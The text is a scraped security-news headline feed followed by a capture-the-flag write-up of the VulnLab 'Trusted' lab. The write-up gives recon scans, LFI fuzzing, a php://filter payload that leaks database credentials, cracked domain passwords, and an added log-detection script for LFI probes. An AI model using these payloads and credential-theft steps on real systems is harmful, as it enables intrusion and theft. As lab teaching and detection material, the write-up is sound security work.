ProcessUnity accelerates third-party assessmentsProcessUnity announced the next generation of the Global Risk Exchange. This platform transforms the third-party assessment process, reducing friction for both organizations and their third parties while streamlining vendor onboarding and accelerating assessment cycles. “The Global Risk Exchange makes the third-party assessment process easier for everyone involved while better protecting organizations’ sensitive data and business operations,” said ProcessUnity CEO Sean Cronin. “Our assessment data eliminates the duplicative assessment requests multiple organizations place on the same … More → The post ProcessUnity accelerates third-party assessments appeared first on Help Net Security.
by Help Net Security
2025-02-18 12:14:00
Lee Enterprises says cyberattack will likely have material impactThe newspaper chain said attackers encrypted critical applications and impacted billing, payments and print distribution.
by Cybersecurity Dive
2025-02-18 12:07:56
New OpenSSH flaws expose SSH servers to MiTM and DoS attacksOpenSSH has released security updates addressing two vulnerabilities, a man-in-the-middle (MitM) and a denial of service flaw, with one of the flaws introduced over a decade ago. [...]
by BleepingComputer
2025-02-18 12:07:27
Juniper patches critical auth bypass in Session Smart routersJuniper Networks has patched a critical vulnerability that allows attackers to bypass authentication and take over Session Smart Router (SSR) devices. [...]
by BleepingComputer
2025-02-18 11:57:42
Streamlining and Prioritizing Security Mitigations: Introducing PlannerLimited human resources, the complexity in workflows, and the overwhelming volume of threats point to one critical need: streamlined processes that elevate both incident detection and mitigation. Addressing these challenges head-on, Picus is proud to introduce our latest solution: Planner.
by Picus Security
2025-02-18 11:31:42
Mastering Kubernetes in the Cloud: A Guide to Cloud Controller ManagerCloud Controller Manager is a crucial yet often overlooked Kubernetes component that streamlines cloud integrations. Here's why it matters and how to use it effectively.
by ITPro Today
2025-02-18 11:28:43
Microsoft Warns of Improved XCSSET macOS MalwareMicrosoft has observed a new variant of the XCSSET malware being used in limited attacks against macOS users. The post Microsoft Warns of Improved XCSSET macOS Malware appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 11:28:02
Compliance Isn’t Security: Why a Checklist Won’t Stop CyberattacksThink you're safe because you're compliant? Think again. Recent studies continue to highlight the concerning trend that compliance with major security frameworks does not necessarily prevent data breaches. Learn more from Pentera on how automated security validation bridges the security gaps. [...]
by BleepingComputer
2025-02-18 11:27:20
Gravy Analytics leak: How to protect your location data | Kaspersky official blogIn the context of the leak at major location-data broker Gravy Analytics, we explain why you need to protect your location data — and how.
by Kaspersky
2025-02-18 11:13:20
OpenSSH Vulnerabilities Exposed Millions to Multi-Year RisksThe Qualys Threat Research Unit (TRU) has disclosed two critical vulnerabilities in OpenSSH—CVE-2025-26465 and CVE-2025-26466 — affecting both the client and server components. The first allows machine-in-the-middle (MitM) attacks against the OpenSSH client when the VerifyHostKeyDNS option is enabled. The second enables an asymmetric denial-of-service (DoS) attack that consumes both memory and CPU, affecting both … The post OpenSSH Vulnerabilities Exposed Millions to Multi-Year Risks appeared first on CyberInsider.
by Cyber Insider
2025-02-18 11:05:00
Palo Alto Networks Confirms Exploitation of Firewall VulnerabilityPalo Alto Networks has confirmed that a recently patched firewall vulnerability tracked as CVE-2025-0108 is being actively exploited. The post Palo Alto Networks Confirms Exploitation of Firewall Vulnerability appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 11:04:53
Chase to decline social media-directed Zelle paymentsChase Bank customers sending Zelle payments may be sought to provide details, including payment purpose and means of contact with recipients, said the bank in an updated user policy.
by SC Media
2025-02-18 11:03:50
Funding round secures $100M for AI cybersecurity startup DreamSuch newly raised funds would be channeled toward creating more advanced AI models for defending critical infrastructure and bolstering its current models, while opening new offices in the U.S. and South America, according to Dream, which was co-founded by former NSO Group CEO Shalev Hulio and former Austrian Prime Minister Sebastian Kurz.
by SC Media
2025-02-18 11:01:10
Severe supply chain flaw impacting newly acquired firm nets over $50K rewardEvaluation of the firm's online resources led to the identification of a DockerHub organization containing a Docker image that not only contained the company's backend systems source code but also a .git folder with a GitHub Actions authorization token.
by SC Media
2025-02-18 10:59:57
Authentication credential compromise likely with Xerox VersaLink printer flawsThreat actors with configuration page access to VersaLink printers with proper Lightweight Directory Access Protocol settings could enable IP address alterations and clear-text LDAP service credential compromise, according to Rapid7 researchers.
by SC Media
2025-02-18 10:56:00
Cybercriminals Exploit Onerror Event in Image Tags to Deploy Payment SkimmersCybersecurity researchers have flagged a credit card stealing malware campaign that has been observed targeting e-commerce sites running Magento by disguising the malicious content within image tags in HTML code in order to stay under the radar. MageCart is the name given to a malware that's capable of stealing sensitive payment information from online shopping sites. The attacks are known to
by The Hacker News
2025-02-18 10:54:19
Privacy concerns prompt South Korean suspension of DeepSeek"This temporary suspension of the DeepSeek app restricts new app downloads from the app market, and we ask existing users to use it cautiously, such as not entering personal information in the DeepSeek input window (prompt) until the final results are announced," said the PIPC, which committed to bolstering data privacy guidance and compliance checking efforts.
by SC Media
2025-02-18 10:51:45
DeepSeek subjected to Texas investigationBoth Google and Apple have already been sought by Texas Attorney General Ken Paxton to provide documents submitted by DeepSeek to be published on their respective app stores, as well as their analyses of the AI app.
by SC Media
2025-02-18 10:28:25
RansomHub: Analyzing the TTPs of One of the Most Notorious Ransomware Variants of 2024RansomHub, a ransomware-as-a-service variant formerly known as Cyclops and Knight, has become one of the most pervasive threats to critical sectors—from water and wastewater systems to healthcare and transportation. Leveraging a double-extortion model, RansomHub encrypts systems and exfiltrates data while demanding ransoms from victims.
by Picus Security
2025-02-18 10:21:58
Phishing campaign targets Microsoft device-code authentication flowsRussian state-sponsored hackers have attacked enterprises and government agencies in North America and overseas.
by Cybersecurity Dive
2025-02-18 10:04:49
PirateFi game on Steam spreads massive malwareA free game called PirateFi, available on Steam, was found distributing the Vidar info-stealing malware to unsuspecting users. The post PirateFi game on Steam spreads massive malware appeared first on ZENDATA Cybersecurity.
by Zendata
2025-02-18 10:00:49
StaryDobry ruins New Year’s Eve, delivering miner instead of presentsKaspersky GReAT experts have discovered a new campaign distributing the XMRig cryptominer through popular games such as BeamNG.drive and Dyson Sphere Program on torrent trackers.
by Securelist
2025-02-18 10:00:00
EY: Industrial companies worldwide stunted in emerging technology use
by ComputerWeekly
2025-02-18 09:54:59
Ex-NSO Group CEO’s Security Firm Dream Raises $100M at $1.1B ValuationIsraeli cybersecurity startup Dream has raised $100 million in Series B funding and is now valued at $1.1 billion. The post Ex-NSO Group CEO’s Security Firm Dream Raises $100M at $1.1B Valuation appeared first on SecurityWeek.
by SecurityWeek
2025-02-18 09:54:56
Palo Alto Networks warns firewall vulnerability is under active exploitationThe flaw, when chained together with a prior vulnerability, can allow an attacker to gain access to unpatched firewalls.
by Cybersecurity Dive
2025-02-18 08:49:39
Xerox VersaLink C7025 Multifunction printer flaws may expose Windows Active Directory credentials to attackersXerox VersaLink C7025 Multifunction printer flaws could allow attackers to capture authentication credentials via pass-back attacks via LDAP and SMB/FTP services. Rapid7 researchers discovered vulnerabilities in Xerox Versalink C7025 Multifunction printers (MFPs) that could allow attackers to capture authentication credentials via pass-back attacks via LDAP and SMB/FTP services. The vulnerabilities are: The vulnerabilities impact Xerox […]
by Security Affairs
2025-02-18 08:30:00
Cyber Monitoring Centre develops hurricane scale to count cost of cyber attacks
by ComputerWeekly
2025-02-18 07:35:35
Lee Enterprises newspaper disruptions caused by ransomware attackNewspaper publishing giant Lee Enterprises has confirmed that a ransomware attack is behind ongoing disruptions impacting the group's operations for over two weeks. [...]
by BleepingComputer
2025-02-18 07:30:21
New XCSSET macOS malware variant used in limited attacksMicrosoft discovered a new variant of the Apple macOS malware XCSSET that was employed in limited attacks in the wild. Microsoft Threat Intelligence discovered a new variant of the macOS malware XCSSET in attacks in the wild. XCSSET is a sophisticated modular macOS malware that targets users by infecting Xcode projects, it has been active since at […]
by Security Affairs
2025-02-18 06:00:33
The risks of autonomous AI in machine-to-machine interactionsIn this Help Net Security, Oded Hareven, CEO of Akeyless Security, discusses how enterprises should adapt their cybersecurity strategies to address the growing need for machine-to-machine (M2M) security. According to Hareven, machine identities must be secured and governed similarly to human identities, focusing on automation and policy-as-code. How should enterprises reframe their cybersecurity strategies to account for machine-to-machine interactions? Enterprises need to recognize that machine-to-machine interactions have fundamentally different identity requirements than human-to-system interactions. Traditional … More → The post The risks of autonomous AI in machine-to-machine interactions appeared first on Help Net Security.
by Help Net Security
2025-02-18 05:50:00
MSP cuts costs with Scality pay-as-you-go anti-ransomware storage
by ComputerWeekly
2025-02-18 05:01:04
VulnLab Trusted | Maverick Got Your Trusted Baby

📌 Overview

First, it's Maverick. Did you miss me?! 😎 Here we go again, another black-hat-style adventure with an awesome machine from VulnLab! Buckle up, because this one's got everything: web hacking, RDP bypasses, and some serious AD trust abuse.

It all starts with a web application, your golden ticket to initial access (because honestly, what's an AD machine without a vulnerable web app?). From there, things escalate quickly. I managed to get past Restricted Admin mode on RDP (because restrictions are just suggestions, right?), pop a full session, and unleash chaos on AD trusts.

Expect Kerberos magic, token shenanigans, and a moment where you question if Microsoft secretly enjoys red teamers breaking their security. In the end, domain admin falls like a house of cards, and I walk away like a legend. 🔥

The Scope

trusted.vl : 10.10.231.181

nmap -sCV 10.10.231.181 -oN nmap_181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 20:26 EET
Nmap scan report for 10.10.231.181
Host is up (0.61s latency).
Not shown: 990 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-15 18:34:06Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-15T18:34:49+00:00; +7m03s from scanner time.
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2025-02-14T18:32:04
|_Not valid after:  2025-08-16T18:32:04
| rdp-ntlm-info:
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-02-15T18:34:40+00:00
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-02-15T18:34:40
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 7m03s, deviation: 0s, median: 7m03s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.21 seconds

lab.trusted.vl : 10.10.231.182

nmap -sCV 10.10.231.182 -oN nmap_182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 20:27 EET
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 20:27 (0:00:00 remaining)
Stats: 0:02:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 6.67% done; ETC: 20:29 (0:00:14 remaining)
Nmap scan report for 10.10.231.182
Host is up (0.56s latency).
Not shown: 985 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.231.182/dashboard/
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-15 18:36:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| tls-alpn:
|_  http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.231.182/dashboard/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 9
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, LongColumnFlag, InteractiveClient, IgnoreSigpipes, SupportsTransactions, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsCompression, ODBCClient, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: A$/^m)#r6W1/8j.FV\KC
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-15T18:37:20+00:00; +7m03s from scanner time.
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2025-02-14T18:32:04
|_Not valid after:  2025-08-16T18:32:04
| rdp-ntlm-info:
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-02-15T18:37:03+00:00
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7m02s, deviation: 0s, median: 7m02s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-02-15T18:37:05
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.81 seconds

There are many ways to get initial access: one from the web and another using MySQL credentials. But to be honest, I don't want to dig too deep at this stage, because the machine is called "Trusted", so we need to focus on the trust attack rather than exploring multiple initial access paths.

🎯 Step Back: Mapping the Attack Surface

But let's take a step back. We have two IPs in scope: trusted.vl and lab.trusted.vl. We need to enumerate every single service from the scan, such as SMB, LDAP, and Kerberos, just as I mentioned in my latest blog posts. You have to be organized when solving any AD machine to get good results.

But we also have a web app, and it seems to contain some good stuff. However, let's imagine we don't have a web app in this scenario. In that case, we should start by testing for valid Kerberos users, then move on to Kerberoasting and AS-REP Roasting. And of course, when testing SMB, always check for anonymous login, because if you're lucky, you might just find some user accounts from it or even from LDAP.

Port 80

As you can see, it's a web server. So when I see that, I immediately start fuzzing for directories, because I might find some juicy ones through fuzzing. So, let's fuzz!

┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]
└─# gobuster dir -u http://10.10.231.182/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.231.182/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 302]
/.hta                 (Status: 403) [Size: 302]
/.htpasswd            (Status: 403) [Size: 302]
/aux                  (Status: 403) [Size: 302]
/cgi-bin/             (Status: 403) [Size: 302]
/com4                 (Status: 403) [Size: 302]
/com3                 (Status: 403) [Size: 302]
/com2                 (Status: 403) [Size: 302]
/com1                 (Status: 403) [Size: 302]
/con                  (Status: 403) [Size: 302]
/dashboard            (Status: 301) [Size: 342] [--> http://10.10.231.182/dashboard/]
/dev                  (Status: 301) [Size: 336] [--> http://10.10.231.182/dev/]
/examples             (Status: 503) [Size: 402]
/favicon.ico          (Status: 200) [Size: 30894]
/img                  (Status: 301) [Size: 336] [--> http://10.10.231.182/img/]
/index.php            (Status: 302) [Size: 0] [--> http://10.10.231.182/dashboard/]
/licenses             (Status: 403) [Size: 421]
/lpt1                 (Status: 403) [Size: 302]
/lpt2                 (Status: 403) [Size: 302]
/nul                  (Status: 403) [Size: 302]
/phpmyadmin           (Status: 403) [Size: 302]
/prn                  (Status: 403) [Size: 302]
/server-info          (Status: 403) [Size: 421]
/server-status        (Status: 403) [Size: 421]
/webalizer            (Status: 403) [Size: 302]
Progress: 4734 / 4735 (99.98%)
===============================================================
Finished
===============================================================

Hmm, /dev looks interesting 👀. After opening it, I had a feeling this might be vulnerable to LFI 🤔. So, I started fuzzing again!

┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]
└─# ffuf -u "http://10.10.231.182/dev/index.html?view=index.html?file=FUZZ" -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.231.182/dev/index.html?view=index.html?file=FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

C:/apache/php/php.ini                      [Status: 200, Size: 1131, Words: 58, Lines: 35, Duration: 561ms]
C:/apache/logs/access.log                  [Status: 200, Size: 1139, Words: 58, Lines: 35, Duration: 566ms]
C:/Users/Administrator/NTUser.dat          [Status: 200, Size: 1155, Words: 58, Lines: 35, Duration: 578ms]
C:/MySQL/data/mysql.err                    [Status: 200, Size: 1135, Words: 58, Lines: 35, Duration: 589ms]
C:/php5/php.ini                            [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 577ms]
C:/MySQL/data/hostname.err                 [Status: 200, Size: 1141, Words: 58, Lines: 35, Duration: 604ms]
C:/apache/logs/error.log                   [Status: 200, Size: 1137, Words: 58, Lines: 35, Duration: 614ms]
C:/inetpub/wwwroot/global.asa              [Status: 200, Size: 1147, Words: 58, Lines: 35, Duration: 614ms]
C:/MySQL/my.cnf                            [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 628ms]
C:/boot.ini                                [Status: 200, Size: 1111, Words: 58, Lines: 35, Duration: 641ms]
C:/MySQL/data/mysql.log                    [Status: 200, Size: 1135, Words: 58, Lines: 35, Duration: 639ms]
C:/WINDOWS/Repair/SAM                      [Status: 200, Size: 1131, Words: 58, Lines: 35, Duration: 676ms]
C:/MySQL/my.ini                            [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 716ms]
C:/php4/php.ini                            [Status: 200, Size: 1119, Words: 58, Lines: 35, Duration: 719ms]
C:/WINDOWS/php.ini                         [Status: 200, Size: 1125, Words: 58, Lines: 35, Duration: 729ms]
C:/php/php.ini                             [Status: 200, Size: 1117, Words: 58, Lines: 35, Duration: 736ms]
C:/WINDOWS/System32/drivers/etc/hosts      [Status: 200, Size: 1163, Words: 58, Lines: 35, Duration: 593ms]
C:/Windows/repair/security                 [Status: 200, Size: 1141, Words: 58, Lines: 35, Duration: 605ms]
C:/WINNT/win.ini                           [Status: 200, Size: 1121, Words: 58, Lines: 35, Duration: 595ms]
C:/xampp/apache/bin/php.ini                [Status: 200, Size: 1143, Words: 58, Lines: 35, Duration: 590ms]
C:/Windows/Panther/Unattend/Unattended.xml [Status: 200, Size: 1173, Words: 58, Lines: 35, Duration: 578ms]
C:/Windows/Panther/Unattended.xml          [Status: 200, Size: 1155, Words: 58, Lines: 35, Duration: 570ms]
C:/Windows/debug/NetSetup.log              [Status: 200, Size: 1147, Words: 58, Lines: 35, Duration: 610ms]
C:/Windows/system32/config/AppEvent.Evt    [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 622ms]
C:/Windows/system32/config/SecEvent.Evt    [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 608ms]
C:/Windows/system32/config/default.sav     [Status: 200, Size: 1165, Words: 58, Lines: 35, Duration: 617ms]
C:/Windows/system32/config/security.sav    [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 618ms]
C:/Windows/system32/config/software.sav    [Status: 200, Size: 1167, Words: 58, Lines: 35, Duration: 569ms]
C:/Windows/system32/config/system.sav      [Status: 200, Size: 1163, Words: 58, Lines: 35, Duration: 572ms]

Note that every hit comes back with the same word count (58) and line count (35): that is the signature of a generic page being returned regardless of the path, not of real file contents, which is why the next ffuf run filters on 58 words.

The source of the index.html file can be checked using php://filter to encode its contents in base64. This reveals any PHP code that would otherwise be executed rather than shown if requested in plain text. After viewing the source, it becomes clear why local file inclusion was possible: the page calls include on a GET parameter and accepts whatever file name it is given. Additionally, there's a comment from Eric mentioning the database connection setup.
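The /dev page hands the view parameter straight to include, so the request shapes the ffuf run above produced (php:// stream wrappers, absolute Windows paths, directory traversal) are exactly what a defender should be watching for in the Apache access log. The detector below is an added example, not code from the write-up or from VulnLab; its log lines are constructed to mirror the probes above, and the client address is the write-up's attacker IP reused as a sample value.

```python
"""Flag local-file-inclusion probes in Apache access logs.

Added example (not from the write-up): a small detector for the request shapes
the /dev/index.html?view= endpoint was hit with, namely php:// stream wrappers,
absolute Windows paths and directory traversal inside a query-string value.
The log lines at the bottom are constructed for the example.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined log prefix: client, identd, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# (rule name, regex) applied to each fully URL-decoded parameter value; first match wins.
RULES = [
    ("php_wrapper", re.compile(r'^(php|data|expect|phar|zip)://', re.I)),
    ("traversal", re.compile(r'\.\.[\\/]')),
    # drive letter at the start of the value or after '=' (covers view=index.html?file=C:/...)
    ("windows_abs_path", re.compile(r'(?:^|[=&\s])[A-Za-z]:[\\/]')),
    ("unix_abs_path", re.compile(r'(?:^|[=&\s])/(etc|proc|var|root|home)/', re.I)),
]


def decode_param(value: str) -> str:
    """Decode twice so double-encoded payloads (%252e%252e) are normalised too."""
    return unquote(unquote(value))


def classify(target: str) -> list[tuple[str, str, str]]:
    """Return (param, rule, decoded_value) for each query parameter that trips a rule."""
    hits = []
    for param, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_param(raw)
        for name, rx in RULES:
            if rx.search(value):
                hits.append((param, name, value))
                break
    return hits


def scan(lines: list[str]) -> list[dict]:
    """Parse each access-log line and emit one alert per suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-request line; skip it
        for param, rule, value in classify(m["target"]):
            alerts.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "param": param, "rule": rule, "value": value,
            })
    return alerts


def summarize(alerts: list[dict]) -> dict[str, int]:
    """Alert count per client address, the number an analyst would threshold on."""
    return dict(Counter(a["ip"] for a in alerts))


# Constructed log lines shaped like the probes in the write-up (client IP reused as a sample).
SAMPLE_LOG = [
    '10.8.5.124 - - [15/Feb/2025:20:51:19 +0200] "GET /dev/index.html?view=index.html HTTP/1.1" 200 1117',
    '10.8.5.124 - - [15/Feb/2025:20:51:20 +0200] "GET /dev/index.html?view=index.html?file=C:/boot.ini HTTP/1.1" 200 1111',
    '10.8.5.124 - - [15/Feb/2025:20:52:03 +0200] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=C:\\xampp\\htdocs\\dev\\db.php HTTP/1.1" 200 763',
    '10.8.5.124 - - [15/Feb/2025:20:52:10 +0200] "GET /dev/index.html?view=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 1121',
    '10.8.5.124 - - [15/Feb/2025:20:52:11 +0200] "GET /dashboard/ HTTP/1.1" 200 7502',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f'{alert["ip"]} {alert["rule"]:17} {alert["param"]}={alert["value"]}')
    print(summarize(scan(SAMPLE_LOG)))
```

The status code is deliberately not used as a filter: as the ffuf output shows, this endpoint answers 200 whether or not the file exists, so a rule keyed on 4xx/5xx would miss the whole run. The decoded value, not the raw one, is matched so that percent-encoded traversal is caught.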
After fuzzing for PHP files, db.php is discovered.

┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]
└─# ffuf -u "http://10.10.231.182/dev/index.html?view=FUZZ.php" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -fw 58

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.231.182/dev/index.html?view=FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 58
________________________________________________

db                      [Status: 200, Size: 763, Words: 26, Lines: 31, Duration: 556ms]
system                  [Status: 200, Size: 892, Words: 47, Lines: 32, Duration: 683ms]
pear                    [Status: 200, Size: 741, Words: 25, Lines: 31, Duration: 702ms]
table                   [Status: 200, Size: 1185, Words: 67, Lines: 38, Duration: 562ms]
con                     [Status: 200, Size: 1079, Words: 56, Lines: 35, Duration: 553ms]
aux                     [Status: 200, Size: 1077, Words: 55, Lines: 35, Duration: 4709ms]

http://10.10.231.182/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php

PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=

┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]
└─# echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d
<?php
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

So, as you can see, we got the MySQL credentials. After that, we log in to MySQL and enumerate the database, where we find hashes. Cracking them gives us the credentials for rsmith. Finally, we validate them using NetExec (nxc).

┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]
└─# nxc smb 10.10.231.182 -u 'rsmith' -p 'IHateEric2' --shares
SMB         10.10.231.182   445    LABDC            [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB         10.10.231.182   445    LABDC            [+] lab.trusted.vl\rsmith:IHateEric2
SMB         10.10.231.182   445    LABDC            [*] Enumerated shares
SMB         10.10.231.182   445    LABDC            Share           Permissions     Remark
SMB         10.10.231.182   445    LABDC            -----           -----------     ------
SMB         10.10.231.182   445    LABDC            ADMIN$                          Remote Admin
SMB         10.10.231.182   445    LABDC            C$                              Default share
SMB         10.10.231.182   445    LABDC            IPC$            READ            Remote IPC
SMB         10.10.231.182   445    LABDC            NETLOGON        READ            Logon server share
SMB         10.10.231.182   445    LABDC            SYSVOL          READ            Logon server share

